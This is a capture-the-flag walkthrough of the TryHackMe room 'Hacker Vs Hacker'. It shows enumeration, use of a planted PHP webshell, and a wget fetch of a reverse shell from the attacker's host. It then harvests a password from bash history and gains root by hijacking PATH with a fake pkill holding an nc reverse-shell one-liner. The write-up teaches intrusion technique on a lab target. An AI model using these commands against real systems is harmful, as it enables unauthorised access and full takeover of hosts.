# CTF TryHackMe - Hacker Vs Hacker

## Nmap 

```bash
nmap -sC -sV -Pn -oN nmap.log 10.10.117.227
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-23 01:06 EDT
Nmap scan report for 10.10.117.227
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9f:a6:01:53:92:3a:1d:ba:d7:18:18:5c:0d:8e:92:2c (RSA)
|   256 4b:60:dc:fb:92:a8:6f:fc:74:53:64:c1:8c:bd:de:7c (ECDSA)
|_  256 83:d4:9c:d0:90:36:ce:83:f7:c7:53:30:28:df:c3:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: RecruitSec: Industry Leading Infosec Recruitment
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.69 seconds
```
Open ports :
* 22 - SSH 
* 80 - HTTP - Apache 2.4.41


## WebSite enumeration

By checking the source code of the webpage i found a form to upload a CV.

```
<p class="section-description">Please upload your CV below and we will get back to you if we think your skills might earn us a profit for doing nothing beyond sending a few emails.</p>
   <form action="upload.php" method="post" enctype="multipart/form-data">
     <input class="button" type="file" name="fileToUpload" id="fileToUpload">
     <input class="button-primary" type="submit" value="Upload CV" name="submit">
     <!-- im no security expert - thats what we have a stable of nerds for - but isn't /cvs on the public website a privacy risk? -->
   </form>
```

But, the upload doesnt work (a hacker has closed this way)

```
Hacked! If you dont want me to upload my shell, do better at filtering!

<!-- seriously, dumb stuff:

$target_dir = "cvs/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);

if (!strpos($target_file, ".pdf")) {
  echo "Only PDF CVs are accepted.";
} else if (file_exists($target_file)) {
  echo "This CV has already been uploaded!";
} else if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
  echo "Success! We will get back to you.";
} else {
  echo "Something went wrong :|";
}

-->
```

I noticed also a path */cvs* inside a comment 

```
<!-- im no security expert - thats what we have a stable of nerds for - but isn't /cvs on the public website a privacy risk? -->
```

But directory listing is disable on */cvs*

## Bruteforce webdirectory listing on /cvs

We can see above, the filtering check if the extension is a php file or not. So let's bruteforce directory with *.pdf.php* extension

```bash
gobuster dir -u http://10.10.89.22/cvs -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x pdf.php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.89.22/cvs
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              pdf.php
[+] Timeout:                 10s
===============================================================
2022/08/24 01:20:31 Starting gobuster in directory enumeration mode
==============================================================                                                     
/shell.pdf.php        (Status: 200) [Size: 18]
```

We got a **shell.pdf.php**

Check if it has a parameter to execute commande injection


## Use hacker's backdoor

trying some parameter like "cmd" 

```bash
curl http://10.10.89.22/cvs/shell.pdf.php?cmd=id

<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>
boom!!
```

Ok, we have command injection. Go to reverse shell


## Reverse shell

First, create a php reverse shell, and start nc listener (`nc -lvnp 9001` in my case)
Second, download the shell from the victim

```
http://10.10.89.22/cvs/shell.pdf.php?cmd=wget http://10.8.90.22:8000/gshell.php
```

And, call the php shell 

```
http://10.10.89.22/cvs/gshell.php
```

Okay, we are in 

```bash
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## PrivEsc to a user

Trying to get access has **Lachlan**

Found potentially password of this user :

```bash
$ cat /home/lachlan/.bash_history
./cve.sh
./cve-patch.sh
vi /etc/cron.d/persistence
echo -e "dHY5pzmNYoETv7SUaY\nthisistheway123\nthisistheway123" | passwd
ls -sf /dev/null /home/lachlan/.bash_history
```

Trying ;

```
$ su lachlan
Password: thisistheway123

id
uid=1001(lachlan) gid=1001(lachlan) groups=1001(lachlan)
```

We are Lachlan now

## PrivEsc to root user

Previously in the bash_history of lachlan i saw an edited cron job */etc/cron.d/persistence*

Let's check :

```bash
$ ls -la /etc/cron.d/persistence
-rw-r--r-- 1 root root 814 May  5 04:38 /etc/cron.d/persistence
````

```bash
$ cat /etc/cron.d/persistence

PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1  && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
```

These crons kill all the tty on the machine.

First we can connect by ssh without pty with this following command :

```bash
ssh -T lachlan@10.10.89.22
```

We can see the PATH is */home/lachlan/bin* and the *pkill* command is not is absolute path. We can override this :

```bash
cd /home/lachlan/bin
echo "!#/bin/bash" >> pkill
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.90.22 9002 >/tmp/f" >> pkill
chmod +x pkill
```

Start a listener 

```bash
nc -lvnp 9002
```
And then we need to trigger the creation of a pty

```bash
python3 -c 'import pty; pty.spawn("/bin/sh")'
```

And we'rrr Root ! :D

```
nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.8.90.22] from (UNKNOWN) [10.10.202.122] 58556
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
```
